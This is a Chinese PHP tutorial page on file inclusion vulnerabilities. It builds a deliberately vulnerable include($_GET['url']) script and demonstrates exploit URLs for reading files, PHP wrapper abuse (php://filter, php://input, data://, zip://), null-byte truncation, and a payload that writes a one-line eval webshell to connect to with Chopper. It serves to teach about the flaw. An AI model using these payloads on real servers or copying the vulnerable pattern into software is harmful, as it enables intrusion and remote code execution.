Backend Development
PHP Tutorial
A brief exploration into the principle of PHP file containing vulnerabilities
A brief exploration into the principle of PHP file containing vulnerabilities
文件包含漏洞原理浅探
文件包含
文件包含是指一个文件里面包含另外一个文件;开发过程中,重复使用的函数会写入单独的文件中,需要使用该函数的时候直接从程序中调用该文件即可,这一个过程就是“文件包含”
由于文件包含的功能特性,导致客户端可以调用一个恶意文件,进行动态调用
PHP文件包含
PHP提供了四个文件包含函数提供的功能强大且灵活多变,经常存在文件包含函数
(推荐学习:PHP视频教程)
include()
无法查到被包含的文件时产生错误"E_COMPLE_ERROR"停止运行
include_once()
和前者一样,如果文件中的代码已经包含了,则不再会包含
require()
无法查到被包含的文件是产生警告"E_WARNING"继续运行
require_once()
和前者一样,无法查到被包含的文件是产生警告"E_WARNING"继续运行
开发演示
<?php
include("ArrayUtil.php"); //利用include函数包含
$arr = array("sougou","google","yahoo","baidu","FackBook");
PrintArr($arr);
?><?php
function PrintArr($arr,$sp=' ==> ',$lin="<br/>"){
foreach ($arr as $key => $value) {
echo "$key $sp $value $lin";
}
}
?>在index.php文件中使用include函数文件包含ArrayUtil.php文件,在index.php中可以使用ArrayUtil.php文件中的PrintArr()函数;在index.php第4行我们调用了PrintArr()函数。
使用浏览器访问index.php
漏洞演示(本地执行)
<?php
include("phpinfo.txt");
?><?php
phpinfo();
?>
喏!一个txt文件被成功包含了;笔者测试了其它各种服务器可接受的文件格式,均实验成功!由此笔者得到的论证是:include()函数包含的任何文件都会以PHP文件解析,但前提是文件的内容符合PHP代码规范;若内容不符合PHP代码规范则会在页面暴露文件内容(这是重点)
漏洞演示(远程执行)
PHP不单单可以在服务端(本地)执行文件包含,也可以远程执行文件包含;
远程的文件包含执行需要修改PHP.ini配置文件(php默认关闭远程包含文件)
allow_url_include = on
由于我们不具备远程条件,只好本地搭建环境将就一下哈!!!
D:\phpStudy\phpinfo.txt
<?php
phpinfo();
?>127.0.0.1/index.php
<?php
include("D:\phpStudy\phpinfo.txt");
?>换一个方法
<?php
include($_GET['url']);
?>// 记住这个代码后面会一直使用
这里的URL参数值提交的只是一个远程包含文件的URL地址;远程文件包含和本地文件包含的解析方法一样,只要符合PHP代码规范就可以按照PHP代码解析执行。
如果我们包含的文件不存在,则会发生Error,网站的路径就会暴露!
读取敏感文件
构造类似http://127.0.0.1/?url=.\phpinfo.txt
喏!我们看见了文本内容,为什么呢?
因为include()函数会执行文件包含,不管是什么格式的文件只要符合PHP代码规范的内容就会按照PHP解析;而不符合PHP代码规范的则会直接输出文件内容。
综合特性:利用该特性包含文件的方法,访问本地的其它文件均会执行php解析或者回显文本的内容;尤其是系统敏感文件,例如php.ini配置文件、my.ini配置文件等敏感信息,而文件的路径则需要结合其它姿势来获得(例如上面利用error回显的方式)
重要的一点:得具有文件的操作权限哦
远程包含Shell
远程包含文本的条件是 allow_url_fopen= on
创建shell.txt(功能:在服务端本地创建一句话木马脚本)
<?php
$key= ("<?php @eval(\$_POST['mirror']);?>");//$符号需要转义要按字符存
$file = fopen("shell.php","w");
fwrite($file, $key);
fclose($file);
?>构造:http://127.0.0.1/?url=..\xx\shell.txt
远程包含文本执行成功后,服务端本地会创建一个"shell.php"一句话木马执行文件
shell.php创建后,使用“菜刀”连接一句话:
喏!包含执行文件创建本地一个shell.php一句话木马,然后菜刀连木马!一梭子搞定!
文件包含配合上传
利用web应用的上传功能,上传一张伪木马图片,然后利用文件包含执行已上传的图片,然后伪木马图片的功能就是被包含执行后在服务端本地创建一个木马执行php文件
PHP封装协议利用
PHP内置很多的PHP封装协议(详细见官方文档),封装协议的功能和文件函数(fopen(),copy(),file_exists(),filesize())提供的功能相似
allow_url_fopen:on 默认开启 该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。
allow_url_include:off 默认关闭,该选项为on便是允许 包含URL 对象文件等
考虑安全都是全部关闭
内置封装协议
【引用官方文档】
- file:// — 访问本地文件系统
- http:// — 访问 HTTP(s) 网址
- ftp:// — 访问 FTP(s) URLs
- data:// — 数据(RFC 2397)
- glob:// — 查找匹配的文件路径模式
- phar:// — PHP 归档
- ssh2:// — Secure Shell 2
- rar:// — RAR
- ogg:// — 音频流
- expect:// — 处理交互式的流
file://协议:
访问本地文件系统
file://[本地文件的绝对路径和文件名]
php://协议:
访问各个IO流
需要开启 allow_url_include: on
php://stdin:直接访问PHP进程相应的输入或输出流(只读)
php://stdout:直接访问PHP进程相应的输入或输出流(只写)
php://stderr:直接访问PHP进程相应的输入或输出流(只写)
php://filter:进行任意文件读取的利用
php://input:访问请求的原始数据的只读流,将post请求中的数据作为php解析
php://output:只写的数据流,允许print和echo方式写入到输出缓存中
php://fd: 允许直接访问指定的文件描述符
更多详细可以参考官方php://协议文档
zip://协议:
(zip:// , bzip2:// , zlib:// )属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]
注意 井字符号 ’ # ‘ 在url中需要转为 %23
data://协议:
data://text/plain;base64,[string_base64加密后]
glob://协议:
查询匹配的文件路径模式
glob://[url]
<?php
// 循环 ext/spl/examples/ 目录里所有 *.php 文件
// 并打印文件名和文件尺寸
$it = new DirectoryIterator("glob://ext/spl/examples/*.php");
foreach($it as $f) {
printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
}
?>expect://协议:
处理交互式数据流(默认未开启,需要安装PECL—Expect扩展)
expect://command
参见文章:php伪协议实现命令执行的七种姿势
读取PHP文件
利用file://读取文件内容
file://[本地文件的绝对路径和文件名]
利用php://filter读取php文件内容
http://127.0.0.1/?url=php://filter/read=convert.base64-encode/resource=shelll.php
这里的结果是经过Base64加密的
利用php://input:
使用php://input可以执行PHP语句,但是受限于allow_utl_include= On
url text:
http://127.0.0.1/index.php/?url=php://input
Post data:
<?php phpinfo();?>
喏!利用“php://input"执行php代码”post data数据内容“,这里只是回显phpinfo(),如果我们利用php://input执行服务端本地创建php一句话木马文件,后果可想而知
利用data://:
受限于allow_utl_include= Onphp.ini配置
?file=[data://text/plain;base64,[base64编码加密的payload)]
注意没有php闭合标签
利用zip://:
?url=zip://C:\Users\Mirror\Desktop/zip.zip%23shell.php
总结
上面这张图是笔者从FREEBUF漏斗社区的文章中copy来的,算是一个不错的总结^_^
截断包含
magic_quotes_gpc = off函数为Off状态才可以使用,因为在On状态下%00会被转义导致无法截断;https://www.cnblogs.com/timelesszhuang/p/3726736.html
PHP6/7关闭了magic_quotes_gpc函数: PHP6\7关闭magic_quotes_gpc对程序的影响
文件包含的漏洞修复,尤其是include()相关文件包含函数,只要限制后缀名就好了?
<?php
if(iset($_GET['url'])){
include $_GET['url'].".php";
} else{
include 'home.php';
}
?>上述程序就是固定限制后缀名,用户只需要指明文件名就可以,不需要用户提交后缀名
现在我们利用之前的包含手段,包含"shell.php"文件
http://127.0.0.1/index.php/?url=shell.php
由于程序固定了文件后缀格式,于是在后台会构成
shell.php.php
而include()无法查找到“shell.php.php”,故此导致报错
采用字节截断
http://127.0.0.1/index.php/?url=shell.php%00
PHP5.2+的版本渐渐的都修复了字节截断,所以很少有利用了
笔者不做过多的细节说明^_^
本文来自php中文网,php教程栏目,欢迎学习!
The above is the detailed content of A brief exploration into the principle of PHP file containing vulnerabilities. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1670
14
1428
52
1329
25
1274
29
1256
24
PHP: A Key Language for Web Development
Apr 13, 2025 am 12:08 AM
PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7
PHP vs. Python: Understanding the Differences
Apr 11, 2025 am 12:15 AM
PHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHP is suitable for web development, with simple syntax and high execution efficiency. 2. Python is suitable for data science and machine learning, with concise syntax and rich libraries.
PHP and Python: Comparing Two Popular Programming Languages
Apr 14, 2025 am 12:13 AM
PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.
PHP in Action: Real-World Examples and Applications
Apr 14, 2025 am 12:19 AM
PHP is widely used in e-commerce, content management systems and API development. 1) E-commerce: used for shopping cart function and payment processing. 2) Content management system: used for dynamic content generation and user management. 3) API development: used for RESTful API development and API security. Through performance optimization and best practices, the efficiency and maintainability of PHP applications are improved.
The Enduring Relevance of PHP: Is It Still Alive?
Apr 14, 2025 am 12:12 AM
PHP is still dynamic and still occupies an important position in the field of modern programming. 1) PHP's simplicity and powerful community support make it widely used in web development; 2) Its flexibility and stability make it outstanding in handling web forms, database operations and file processing; 3) PHP is constantly evolving and optimizing, suitable for beginners and experienced developers.
PHP and Python: Different Paradigms Explained
Apr 18, 2025 am 12:26 AM
PHP is mainly procedural programming, but also supports object-oriented programming (OOP); Python supports a variety of paradigms, including OOP, functional and procedural programming. PHP is suitable for web development, and Python is suitable for a variety of applications such as data analysis and machine learning.
PHP vs. Other Languages: A Comparison
Apr 13, 2025 am 12:19 AM
PHP is suitable for web development, especially in rapid development and processing dynamic content, but is not good at data science and enterprise-level applications. Compared with Python, PHP has more advantages in web development, but is not as good as Python in the field of data science; compared with Java, PHP performs worse in enterprise-level applications, but is more flexible in web development; compared with JavaScript, PHP is more concise in back-end development, but is not as good as JavaScript in front-end development.
PHP and Python: Code Examples and Comparison
Apr 15, 2025 am 12:07 AM
PHP and Python have their own advantages and disadvantages, and the choice depends on project needs and personal preferences. 1.PHP is suitable for rapid development and maintenance of large-scale web applications. 2. Python dominates the field of data science and machine learning.
